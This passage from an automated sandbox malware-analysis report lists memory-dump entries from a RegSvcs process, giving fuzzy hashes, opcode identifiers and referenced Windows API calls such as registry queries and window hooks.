                                                                                          • Instruction Fuzzy Hash: D5F1A43490522CCFCB66DF68C988AA9F772BF49305F2089E9D40AA7750DB319E85CF51
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 003F796D
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000015.00000002.1190856478.00000000003F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003F0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_21_2_3f0000_RegSvcs.jbxd
                                                                                          Similarity
                                                                                          • API ID: DispatcherExceptionUser
                                                                                          • String ID:
                                                                                          • API String ID: 6842923-0
                                                                                          • Opcode ID: fbebabc7f59691434cc5adda541307a502026895cdc7193f61b27dd24244873f
                                                                                          • Instruction ID: cf37b916a8dea753f9c1f19acb0c155092f21d482e9e5e251cee8c5df3be1243
                                                                                          • Opcode Fuzzy Hash: fbebabc7f59691434cc5adda541307a502026895cdc7193f61b27dd24244873f
                                                                                          • Instruction Fuzzy Hash: 66F1B43490622CCFCB65DF68C988AA9F772BF49305F2089E9D40AA7750DB319E85CF51
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 003F796D
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000015.00000002.1190856478.00000000003F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003F0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_21_2_3f0000_RegSvcs.jbxd
                                                                                          Similarity
                                                                                          • API ID: DispatcherExceptionUser
                                                                                          • String ID:
                                                                                          • API String ID: 6842923-0
                                                                                          • Opcode ID: 8c74b3e85167f608971dd292ec69be2cfed05ebcb7566d6f1082b498ca16c0a8
                                                                                          • Instruction ID: d4a47ca070c5892a5a1ac0b4694b1853a433d0fd0a1170512f377e9d0e899ab3
                                                                                          • Opcode Fuzzy Hash: 8c74b3e85167f608971dd292ec69be2cfed05ebcb7566d6f1082b498ca16c0a8
                                                                                          • Instruction Fuzzy Hash: 0CE1B53490622CCFCB65DF68C988AA9F772BF49305F2089E9D40AA7750DB319E85CF51
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 003F796D
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000015.00000002.1190856478.00000000003F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003F0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_21_2_3f0000_RegSvcs.jbxd
                                                                                          Similarity
                                                                                          • API ID: DispatcherExceptionUser
                                                                                          • String ID:
                                                                                          • API String ID: 6842923-0
                                                                                          • Opcode ID: b755415365f20ce6dc474623e3a14420b18702f4ad35515de453a4a8c7ba88e1
                                                                                          • Instruction ID: ee5fd0b8cee13ff31b5cb52dca540307559bb68e570bea88726e35bb206b3585
                                                                                          • Opcode Fuzzy Hash: b755415365f20ce6dc474623e3a14420b18702f4ad35515de453a4a8c7ba88e1
                                                                                          • Instruction Fuzzy Hash: 0CE1A53490622CCFCB65DF68C988AA9F772BF49305F2089E9D40AA7750DB319E85CF51
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 003F796D
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000015.00000002.1190856478.00000000003F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003F0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_21_2_3f0000_RegSvcs.jbxd
                                                                                          Similarity
                                                                                          • API ID: DispatcherExceptionUser
                                                                                          • String ID:
                                                                                          • API String ID: 6842923-0
                                                                                          • Opcode ID: 3c8f3c081442e4989edf7b01f24a247577d9d368809b1cd9586d510a7cf110fe
                                                                                          • Instruction ID: 9a90a85b484f1c4f93abe8005bfeb061ccbfed42de06df12b49d4bb5c445ed6c
                                                                                          • Opcode Fuzzy Hash: 3c8f3c081442e4989edf7b01f24a247577d9d368809b1cd9586d510a7cf110fe
                                                                                          • Instruction Fuzzy Hash: ECE1B53490622CCFCB65DF68C988AA9F772BF49305F6089E9D40AA7750DB319E85CF41
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 003F796D
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000015.00000002.1190856478.00000000003F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003F0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_21_2_3f0000_RegSvcs.jbxd
                                                                                          Similarity
                                                                                          • API ID: DispatcherExceptionUser
                                                                                          • String ID:
                                                                                          • API String ID: 6842923-0
                                                                                          • Opcode ID: f3b629a289e94692e4541ae2f99df83871816ffc154bd0757795f3911a45a1a3
                                                                                          • Instruction ID: 594465a900ea86fc3a5685e253434f677cf85ae92a26b14b44412d93e8863342
                                                                                          • Opcode Fuzzy Hash: f3b629a289e94692e4541ae2f99df83871816ffc154bd0757795f3911a45a1a3
                                                                                          • Instruction Fuzzy Hash: C6E1A53490522CCFCB65DF68C998AA9F772BF49305F2089E9D40AA7750DB319E85CF41
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 003F796D
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000015.00000002.1190856478.00000000003F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003F0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_21_2_3f0000_RegSvcs.jbxd
                                                                                          Similarity
                                                                                          • API ID: DispatcherExceptionUser
                                                                                          • String ID:
                                                                                          • API String ID: 6842923-0
                                                                                          • Opcode ID: ad8fbde7ef80251e352a534b5f843396df930394a119441b66db9dfec80b4596
                                                                                          • Instruction ID: ec8dca9fc9987ab218f223836c684d962bff4f605b7e108aa17bb110af0b0119
                                                                                          • Opcode Fuzzy Hash: ad8fbde7ef80251e352a534b5f843396df930394a119441b66db9dfec80b4596
                                                                                          • Instruction Fuzzy Hash: 76D1B63490522CCFCB65DF68C998AA9F772BF49305F2089E9D40AA7750DB319E85CF41
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 003F796D
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000015.00000002.1190856478.00000000003F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003F0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_21_2_3f0000_RegSvcs.jbxd
                                                                                          Similarity
                                                                                          • API ID: DispatcherExceptionUser
                                                                                          • String ID:
                                                                                          • API String ID: 6842923-0
                                                                                          • Opcode ID: e1e65fe296c4edc1eb759e2285f103aaf64ab11b8c3e4ebe653c62736f935bb7
                                                                                          • Instruction ID: 08d398620cd835a39746fb4fda49c32dc89916bed810f11ea9a62e554c7fefc9
                                                                                          • Opcode Fuzzy Hash: e1e65fe296c4edc1eb759e2285f103aaf64ab11b8c3e4ebe653c62736f935bb7
                                                                                          • Instruction Fuzzy Hash: B0D1A63490622CCFCB65DF68C998AA9F772BF49305F2089E9D40AA7750DB319E85CF41
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 003F796D
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000015.00000002.1190856478.00000000003F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003F0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_21_2_3f0000_RegSvcs.jbxd
                                                                                          Similarity
                                                                                          • API ID: DispatcherExceptionUser
                                                                                          • String ID:
                                                                                          • API String ID: 6842923-0
                                                                                          • Opcode ID: 8cb123b980c0101c82d5afb7704b3d8c5948af584e3cf026a7cd80d152d4d1d6
                                                                                          • Instruction ID: b13ee7717d25765f427e85461cc1b9eea56ce2a79911369761e33308e61df5f2
                                                                                          • Opcode Fuzzy Hash: 8cb123b980c0101c82d5afb7704b3d8c5948af584e3cf026a7cd80d152d4d1d6
                                                                                          • Instruction Fuzzy Hash: 9ED1B53490622CCFCB65DF68C998AA9F772BF49305F2089E9D40AA7750DB319E85CF41
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 003F796D
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000015.00000002.1190856478.00000000003F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003F0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_21_2_3f0000_RegSvcs.jbxd
                                                                                          Similarity
                                                                                          • API ID: DispatcherExceptionUser
                                                                                          • String ID:
                                                                                          • API String ID: 6842923-0
                                                                                          • Opcode ID: f53a9b65195d00647ec420f5318a71f97bd87310d1f9ab92579ff7442b8b5cb4
                                                                                          • Instruction ID: 355281d435facc154f4b1c866d880f4ecc4feb2d96976c81ec016b6309c11383
                                                                                          • Opcode Fuzzy Hash: f53a9b65195d00647ec420f5318a71f97bd87310d1f9ab92579ff7442b8b5cb4
                                                                                          • Instruction Fuzzy Hash: 17C1A33490622CCFCB65DF68C988AA9F772BF49305F2089E9D40AA7750DB319E85CF51
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 003F796D
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000015.00000002.1190856478.00000000003F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003F0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_21_2_3f0000_RegSvcs.jbxd
                                                                                          Similarity
                                                                                          • API ID: DispatcherExceptionUser
                                                                                          • String ID:
                                                                                          • API String ID: 6842923-0
                                                                                          • Opcode ID: 292ce8b9440e5bb754120908bd9ad2eacea52bfff74b3cb1445ae6dfb833e530
                                                                                          • Instruction ID: 21ff2af4768e82cba1eb7646c1b172ca8e419b0de9738ab2742b2175d9317114
                                                                                          • Opcode Fuzzy Hash: 292ce8b9440e5bb754120908bd9ad2eacea52bfff74b3cb1445ae6dfb833e530
                                                                                          • Instruction Fuzzy Hash: 34C1A33490622CCFCB65DF28C988AA9F776BF49305F6089E9D40AA7750DB319E85CF41
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          • RegQueryValueExW.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 00C236D1
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000015.00000002.1192424329.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_21_2_c20000_RegSvcs.jbxd
                                                                                          Similarity
                                                                                          • API ID: QueryValue
                                                                                          • String ID:
                                                                                          • API String ID: 3660427363-0
                                                                                          • Opcode ID: bd5dc657168384bc57198e23e0216fa6184d241e13e27a4c98dffbb9a0ae4d7f
                                                                                          • Instruction ID: 83980af8989c097ab2f190f11ba5ec64a5ee4efa8843bad7fd532e3c2638894e
                                                                                          • Opcode Fuzzy Hash: bd5dc657168384bc57198e23e0216fa6184d241e13e27a4c98dffbb9a0ae4d7f
                                                                                          • Instruction Fuzzy Hash: 304137B0E00298DFCB10CFA9D984A9EBFF5BF49700F15806AE818AB750D7749A05CF91
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          • RegOpenKeyExW.KERNEL32(80000001,00000000,?,00000001,?), ref: 00C23414
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000015.00000002.1192424329.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_21_2_c20000_RegSvcs.jbxd
                                                                                          Similarity
                                                                                          • API ID: Open
                                                                                          • String ID:
                                                                                          • API String ID: 71445658-0
                                                                                          • Opcode ID: 2c2e78000906e2b2b8808ce39f3be338527661a0f7d50609b154b1725671ffc1
                                                                                          • Instruction ID: 0bb4fa26ade92996f79ff9f5731bdabdf6e2bc487f4048eb4624af5659675f33
                                                                                          • Opcode Fuzzy Hash: 2c2e78000906e2b2b8808ce39f3be338527661a0f7d50609b154b1725671ffc1
                                                                                          • Instruction Fuzzy Hash: 194149B0D09388CFDB01CFA8D548A9EFFF1AF49304F2581AAD508AB351C7759A45CBA1
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          • RegOpenKeyExW.KERNEL32(80000001,00000000,?,00000001,?), ref: 00C23414
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000015.00000002.1192424329.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_21_2_c20000_RegSvcs.jbxd
                                                                                          Similarity
                                                                                          • API ID: Open
                                                                                          • String ID:
                                                                                          • API String ID: 71445658-0
                                                                                          • Opcode ID: 8b24dc46d135876289bc89654d7bc3a77a2127d5ebaf0b2d8d4b7b65b38ed4fe
                                                                                          • Instruction ID: 2aa9cacd9599742840afb37a0e48cdf7363409ab67fc44d74fe54616cd8817c9
                                                                                          • Opcode Fuzzy Hash: 8b24dc46d135876289bc89654d7bc3a77a2127d5ebaf0b2d8d4b7b65b38ed4fe
                                                                                          • Instruction Fuzzy Hash: 7B4135B0D042988FDB00CF99D588B9EFFF0BF49314F2581AAD409AB341C7759A45CB95
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          • RegQueryValueExW.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 00C236D1
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000015.00000002.1192424329.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_21_2_c20000_RegSvcs.jbxd
                                                                                          Similarity
                                                                                          • API ID: QueryValue
                                                                                          • String ID:
                                                                                          • API String ID: 3660427363-0
                                                                                          • Opcode ID: e6577725b58ab4ec47f9c8333b5bbaff572c0e352c0cfe9839cff3e65a29672f
                                                                                          • Instruction ID: d3e1e8a488556b01b5b3cb305329f10b784e9840ecdc1e4c78bce47dc6094fbf
                                                                                          • Opcode Fuzzy Hash: e6577725b58ab4ec47f9c8333b5bbaff572c0e352c0cfe9839cff3e65a29672f
                                                                                          • Instruction Fuzzy Hash: BD31D2B1D002589FCB10CF9AD984A9EFBF5BF48710F15812AE819AB750D7749A05CF91
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          • RegOpenKeyExW.KERNEL32(80000001,00000000,?,00000001,?), ref: 00C23414
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000015.00000002.1192424329.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_21_2_c20000_RegSvcs.jbxd
                                                                                          Similarity
                                                                                          • API ID: Open
                                                                                          • String ID:
                                                                                          • API String ID: 71445658-0
                                                                                          • Opcode ID: a7a334977eef97598d92a05a09d03b1ec468704a98412d28b5aad44824b8b993
                                                                                          • Instruction ID: f2a5dae110b28b471ece546a654f2091d41d3cf743bb415b59a15850f6047474
                                                                                          • Opcode Fuzzy Hash: a7a334977eef97598d92a05a09d03b1ec468704a98412d28b5aad44824b8b993
                                                                                          • Instruction Fuzzy Hash: FC3101B0D042999FCB00CF99C588A9EFFF1AF49314F24816AE409AB301C7799A45CFA5
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          • SetWindowsHookExW.USER32(?,00000000,?,?), ref: 02093753
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000015.00000002.1192579326.0000000002090000.00000040.00000800.00020000.00000000.sdmp, Offset: 02090000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_21_2_2090000_RegSvcs.jbxd
                                                                                          Similarity
                                                                                          • API ID: HookWindows
                                                                                          • String ID:
                                                                                          • API String ID: 2559412058-0
                                                                                          • Opcode ID: 2ffab0431b43dc203b87cd237ab32613a100d980315ee7ae59785b35cb5d5281
                                                                                          • Instruction ID: 3d4f0f05369f45b9fffda59e081f3c1bbe061395966b05f79d1704f03f233293
                                                                                          • Opcode Fuzzy Hash: 2ffab0431b43dc203b87cd237ab32613a100d980315ee7ae59785b35cb5d5281
                                                                                          • Instruction Fuzzy Hash: 0E2135B5D002098FCB10CFA9D948BEEFBF1EB88314F10842AD42AA7250C775A944CFA1
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          • SetWindowsHookExW.USER32(?,00000000,?,?), ref: 02093753
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000015.00000002.1192579326.0000000002090000.00000040.00000800.00020000.00000000.sdmp, Offset: 02090000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_21_2_2090000_RegSvcs.jbxd
                                                                                          Similarity
                                                                                          • API ID: HookWindows
                                                                                          • String ID:
                                                                                          • API String ID: 2559412058-0
                                                                                          • Opcode ID: 5ed08d5569bdc5b689dc679c9a5bc54093676196670a07eadaf75fe9ccdc3ff3
                                                                                          • Instruction ID: 5564f671953147550e0ae600af11950f1b401d428b15c2aadacb5aafe94bc920
                                                                                          • Opcode Fuzzy Hash: 5ed08d5569bdc5b689dc679c9a5bc54093676196670a07eadaf75fe9ccdc3ff3
                                                                                          • Instruction Fuzzy Hash: 262127B5D002098FCB14CF99D948BEEFBF5EB89314F10842AD419A7350C775A944CFA1
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Memory Dump Source
                                                                                          • Source File: 00000015.00000002.1190160450.00000000001CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 001CD000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_21_2_1cd000_RegSvcs.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: be9f83a834e1e3e0dd13c20dbe82118e3cb9b6cafb0d3ec936614e4efa075b45
                                                                                          • Instruction ID: 83e454999a8e917e1ca5f60f30ef045fe93001e9656ca83ee5aac06c383862de
                                                                                          • Opcode Fuzzy Hash: be9f83a834e1e3e0dd13c20dbe82118e3cb9b6cafb0d3ec936614e4efa075b45
                                                                                          • Instruction Fuzzy Hash: FB21FF71604244EFDB15DF14E984F2ABB71EBA8328F24856DE9094B246C336D856CBA2
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Memory Dump Source
                                                                                          • Source File: 00000015.00000002.1190160450.00000000001CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 001CD000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_21_2_1cd000_RegSvcs.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 31ffa2e07f5161c3dd1dfad183dd8df4a4a2db95dc0c6f2988b238b43cf4de88
                                                                                          • Instruction ID: f6571ab1bc804492958b2a1cd634f6cf14551319dd6f3136041a5b5df1ba64ba
                                                                                          • Opcode Fuzzy Hash: 31ffa2e07f5161c3dd1dfad183dd8df4a4a2db95dc0c6f2988b238b43cf4de88
                                                                                          • Instruction Fuzzy Hash: 68210671104244DFDB19CF14E9C4F26BB65FBA8324F20C57DEA054BA46C336E856CBA2
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Memory Dump Source
                                                                                          • Source File: 00000015.00000002.1190279581.00000000001DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 001DD000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_21_2_1dd000_RegSvcs.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 2dbaba1e4b05e84a233818d5baba8b558cb12ffcb5b1b3b1364ce3073b5347c0
                                                                                          • Instruction ID: 4514a62855a96cf42cc076092a35f6666a2c597b551646cb771054d559aca951
                                                                                          • Opcode Fuzzy Hash: 2dbaba1e4b05e84a233818d5baba8b558cb12ffcb5b1b3b1364ce3073b5347c0
                                                                                          • Instruction Fuzzy Hash: 58210A70604244DFDB15EF24D984B26BBA1EB88318F24C56ED9498F346C336D846CBA2
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Memory Dump Source
                                                                                          • Source File: 00000015.00000002.1190279581.00000000001DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 001DD000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_21_2_1dd000_RegSvcs.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 7ecb20920117a87efb7dd1ac3bb39c2adab579303759c775c42ca15ec8778791
                                                                                          • Instruction ID: 6338d9f6a1a2d1b8e145497da61d54594e061cda35125ee2b0d07bccebf1f36a
                                                                                          • Opcode Fuzzy Hash: 7ecb20920117a87efb7dd1ac3bb39c2adab579303759c775c42ca15ec8778791
                                                                                          • Instruction Fuzzy Hash: AB216D755093809FDB02CB20D994711BFB1EB46314F29C5DBD8888F2A7C33A980ACB62
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Memory Dump Source
                                                                                          • Source File: 00000015.00000002.1190160450.00000000001CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 001CD000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_21_2_1cd000_RegSvcs.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 3e0eb5f64e9d98e6057156d14d80c040d3d52ec1448806123a22752ec917bec3
                                                                                          • Instruction ID: d46e4ff72992eb7dfb4a0ca2010e44851cfe13147da296b0e81253a3cba9e5c9
                                                                                          • Opcode Fuzzy Hash: 3e0eb5f64e9d98e6057156d14d80c040d3d52ec1448806123a22752ec917bec3
                                                                                          • Instruction Fuzzy Hash: 1211D376404280DFCB16CF14E5C4B1ABF71FB94324F24C6ADD8054B656C33AD956CBA2
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Memory Dump Source
                                                                                          • Source File: 00000015.00000002.1190160450.00000000001CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 001CD000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_21_2_1cd000_RegSvcs.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 3e0eb5f64e9d98e6057156d14d80c040d3d52ec1448806123a22752ec917bec3
                                                                                          • Instruction ID: cf1d7ff2e1551628c2250a93bf22408d0370f9b727fa18274f9250cada5195eb
                                                                                          • Opcode Fuzzy Hash: 3e0eb5f64e9d98e6057156d14d80c040d3d52ec1448806123a22752ec917bec3
                                                                                          • Instruction Fuzzy Hash: 3811B176404280DFDB16CF10E5C4B16BF71FB94324F24C5ADD9094B656C336E856CBA2
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%